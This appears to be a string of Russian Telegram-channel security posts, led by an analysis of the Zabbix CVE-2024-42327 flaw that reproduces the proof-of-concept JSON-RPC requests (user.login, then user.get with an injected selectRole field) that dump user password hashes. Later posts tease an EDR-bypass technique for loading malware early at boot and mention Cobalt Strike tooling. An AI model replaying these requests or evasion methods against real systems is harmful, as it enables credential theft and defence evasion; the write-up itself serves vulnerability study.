CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага.

CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.

Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)

Внутри исходника присутствует аргумент selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.

в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.

Первый этап: Аутентификация через API
Метод user.login используется для получения токена сессии, необходимого для выполнения запросов.

{
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "username": "guest",
        "password": "guest_password"
    },
    "id": 1
}

После этого сервер возвращает токен

{
    "jsonrpc": "2.0",
    "result": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод user.get, перебирай ID пользователей

{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid, u.passwd", "roleid"],
        "userids": "1"
    },
    "auth": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

В ответе возвращаются данные с хэшированным паролем

{
    "jsonrpc": "2.0",
    "result": [
        {
            "userid": "1",
            "username": "Admin",
            "name": "Zabbix",
            "surname": "Administrator",
            "passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
        }
    ],
    "id": 1
}

Чтобы провернуть эту схему, нужно иметь доступ к JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.

http://zabbix/api_jsonrpc.php

И учетка с минимальными правами, которая может дернуть метод user.login.
Уязвимые версии:

Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.

cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123

PoC

Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка:
https://habr.com/ru/companies/selectel/articles/862372/

Рубрика .git leaks
*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с Gi7w0rm , добряки )))

Всем хак 👾

Хочу поделиться с вами отличной новостью! Мой знакомый, талантливый багхантер, запустил свой собственный канал, где будет делиться своим опытом и знаниями в области вебчика! 🔍

Сверху репостнул с его канала перевод книги, которую, скорее всего, вы бы не нашли. Это отличная возможность углубить свои знания! 📚

Если вы интересуетесь кибербезопасностью, то обязательно загляните на его канал:
https://t.me/sytem10gs 👈🏻

И, кстати, это не реклама — мне не заплатили ни копейки! Просто хочу поддержать интересный проект.

Подписывайтесь и учитесь! 🦈

🔗Ссылка:
https://opennet.ru/62346/

🔗Ссылка:
https://www.securitylab.ru/news/554549.php

Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка:
https://www.securitylab.ru/news/554565.php

BootExecute EDR Bypass
*
Грузи малварь от ntdll.dll — до полной загрузки операционной системы Windows.
Метод и правда старый и много где используется, всегда логика была в том что бы стартануть раньше AV\EDR и даже килять его (хуки там всякие и тд).
*
D0wnL0@d

🔗Ссылка:
https://habr.com/ru/companies/hh/articles/863350/

🔗Ссылка:
https://opennet.ru/62355/

Всем хак! 👾

Хочу поделиться грустной, но в какой-то степени хорошей новостью 😐

Я планировал выпустить ролик на этих выходных, но осознал, что он не получится таким, каким я его задумывал, и ничего годного не выйдет. Сейчас я задумался взять ту же идею и добавить немного инструментов, таких как Havoc C2, а также рассказать больше о Cobalt Strike и его ките под названием Artifact.

P.S. Не факт, что у меня получится...

Cobalt Strike использует Artifact Kit для создания своих исполняемых файлов и библиотек DLL. Artifact Kit — это платформа с открытым исходным кодом для создания исполняемых файлов и библиотек DLL, которые обходят некоторые антивирусные продукты.

Возможно, также затрону и другие киты и вирусы, которые могут навредить вам в интернете.